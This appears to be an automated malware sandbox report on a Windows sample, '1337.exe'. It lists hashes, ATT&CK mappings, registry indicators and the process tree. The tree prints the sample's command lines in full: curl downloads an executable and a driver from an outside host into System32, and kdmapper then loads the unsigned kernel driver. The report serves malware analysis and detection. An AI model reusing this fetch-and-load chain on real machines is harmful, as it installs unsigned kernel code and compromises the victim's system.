ccde6a0ad1e2f13d5409e6a4f78057ebfc7718d2ae3c171743d2d560356eaecf

General

Target

1337.exe
Size

317KB
MD5

a8647a5e786c9788215992058dbd2733
SHA1

7eed59f691ffdcac634c315733de4325577c827f
SHA256

ccde6a0ad1e2f13d5409e6a4f78057ebfc7718d2ae3c171743d2d560356eaecf
SHA512

67d60067711fc8cbeb15e696453a7f007ffa7d5985bfc73f2d35949fa33355863df66200a13c7256d3d5197d60dbdfa7aad2e7bc36bd3708d6a39ee143df89d3
SSDEEP

6144:8xjV3rWQvEVQi6mC6sfZT6kVzPTMnJ78:8xN+6mC6sBT6kFMnJ

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YZdFLhFJSIMmfXEVgOLvBwVbZEdj\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\YZdFLhFJSIMmfXEVgOLvBwVbZEdj"	kdmapper.exe

Executes dropped EXE 1 IoCs

pid	Process
4124	kdmapper.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\kdmapper.exe	curl.exe
File created	C:\Windows\System32\driver.sys	curl.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
4124	kdmapper.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeLoadDriverPrivilege	4124	kdmapper.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 4912	1496	1337.exe	98
PID 1496 wrote to memory of 4912	1496	1337.exe	98
PID 4912 wrote to memory of 4128	4912	cmd.exe	99
PID 4912 wrote to memory of 4128	4912	cmd.exe	99
PID 1496 wrote to memory of 3756	1496	1337.exe	100
PID 1496 wrote to memory of 3756	1496	1337.exe	100
PID 3756 wrote to memory of 4460	3756	cmd.exe	101
PID 3756 wrote to memory of 4460	3756	cmd.exe	101
PID 1496 wrote to memory of 4104	1496	1337.exe	102
PID 1496 wrote to memory of 4104	1496	1337.exe	102
PID 4104 wrote to memory of 4124	4104	cmd.exe	103
PID 4104 wrote to memory of 4124	4104	cmd.exe	103
PID 1496 wrote to memory of 3560	1496	1337.exe	104
PID 1496 wrote to memory of 3560	1496	1337.exe	104
PID 1496 wrote to memory of 1984	1496	1337.exe	105
PID 1496 wrote to memory of 1984	1496	1337.exe	105

C:\Users\Admin\AppData\Local\Temp\1337.exe
"C:\Users\Admin\AppData\Local\Temp\1337.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://www.exterium.xyz/assetsV2/EA%20Sports/ValoMapper.exe --output C:\Windows\System32\kdmapper.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\curl.exe
    curl --silent https://www.exterium.xyz/assetsV2/EA%20Sports/ValoMapper.exe --output C:\Windows\System32\kdmapper.exe
    3⤵
    - Drops file in System32 directory
    PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://www.exterium.xyz/assetsV2/EA%20Sports/1337%20driver.sys --output C:\Windows\System32\driver.sys >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3756
- - C:\Windows\system32\curl.exe
    curl --silent https://www.exterium.xyz/assetsV2/EA%20Sports/1337%20driver.sys --output C:\Windows\System32\driver.sys
    3⤵
    - Drops file in System32 directory
    PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd C:\Windows\System32\ && kdmapper.exe driver.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4104
- - C:\Windows\System32\kdmapper.exe
    kdmapper.exe driver.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul 2>&1
  2⤵
  PID:1984

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\kdmapper.exe

Filesize
134KB

MD5
34cfbe3ff70461820ccc31a1afeec0b3

SHA1
5d32e91c039c9a6f723ba3c04c1179d02e6a0ce9

SHA256
6ebcc6896b243c761da4fc28a26249b0c146ae17aff7697c09bc447008e831df

SHA512
1ca4661be645e7e954d89c83f1fd126a5e936533052d4e330c9faccb83bb5942d28265375cee743e468b1625a0c1f10888e7957fe88c718e8501a86a78cdc06e

Download Submit
C:\Windows\System32\kdmapper.exe

Filesize
134KB

MD5
34cfbe3ff70461820ccc31a1afeec0b3

SHA1
5d32e91c039c9a6f723ba3c04c1179d02e6a0ce9

SHA256
6ebcc6896b243c761da4fc28a26249b0c146ae17aff7697c09bc447008e831df

SHA512
1ca4661be645e7e954d89c83f1fd126a5e936533052d4e330c9faccb83bb5942d28265375cee743e468b1625a0c1f10888e7957fe88c718e8501a86a78cdc06e

Download Submit
memory/1496-147-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-135-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-134-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-140-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-139-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-138-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-141-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-142-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-143-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-144-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-145-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-146-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-133-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-137-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-156-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-151-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-150-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-153-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-152-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-154-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-155-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-149-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-158-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-157-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-159-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-136-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download
memory/1496-148-0x00000179D2740000-0x00000179D2741000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing